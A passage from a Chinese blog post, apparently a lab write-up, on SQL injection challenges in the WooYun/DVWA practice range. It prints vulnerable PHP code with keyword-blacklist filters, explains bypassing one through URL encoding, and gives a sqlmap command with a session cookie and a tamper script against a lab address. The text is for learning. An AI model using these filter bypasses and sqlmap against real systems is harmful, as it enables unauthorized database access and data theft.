DVWA-WooYun SQL Injection

这篇博客详细介绍了在乌云靶场中遇到的各种SQL Injection(SQL注入)漏洞,包括Sqli QUERY_STRING、Sqli filter、Sqli Mysql、No Comma Sqli等场景,通过实例展示了如何利用sqlmap等工具进行漏洞利用和绕过防御机制的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

乌云靶场 - SQL Injection

Sqli QUERY_STRING

WooYun-2014-61361 Source

inject_check(strtolower($_SERVER['QUERY_STRING']));
$id = $_GET['id'];
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";

......

function inject_check($str) {
    //防注入函数开始
    $check=preg_match('/select|order|insert|update|eval|document|delete|injection|jection|link|and|or|from|union|into|load_file|outfile|<script>/',$str);
    if($check){
        echo "<script>alert('Filtered!!!');window.history.go(-1);</script>";
        exit();
    }else{
        return $str;
    }
} 

将提交内容转成小写再进行检测,$_SERVER['QUERY_STRING']是获取?后面的值,且并不会自动转换url编码,将提交的内容进行URL编码提交即可

sqlmap使用(带上cookie)

sqlmap -u 'http://192.168.16.82:81/vulnerabilities/WooYun-2014-61361/?id=1&Submit=Submit#' --cookie='PHPSESSID=31onlljpiqovge7adlsulis9m4; security=low' --tamper charencode.py --dbs

这里写图片描述

Sqli filter #02-Once

WooYun-2014-53384 Source

$id = $_GET['id'];
$id = tsFilter($id);
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

......

function tsFilter($value){
   
    $value = trim($value);
    //定义不允许提交的SQl命令和关键字
    $words = array();
    $words[] = "add ";
    $words[] = "and ";
    $words[] = "count ";
    $words[] = "order ";
    $words[] = "table ";
    $words[] = "by ";
    $words[] = "create ";
    $words[] = "delete ";
    $words[] = "drop ";
    $words[] = "from ";
    $words[] = "grant ";
    $words[] = "insert ";
    $words[] = "select ";
    $words[] = "truncate ";
    $words[] = "update "</
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值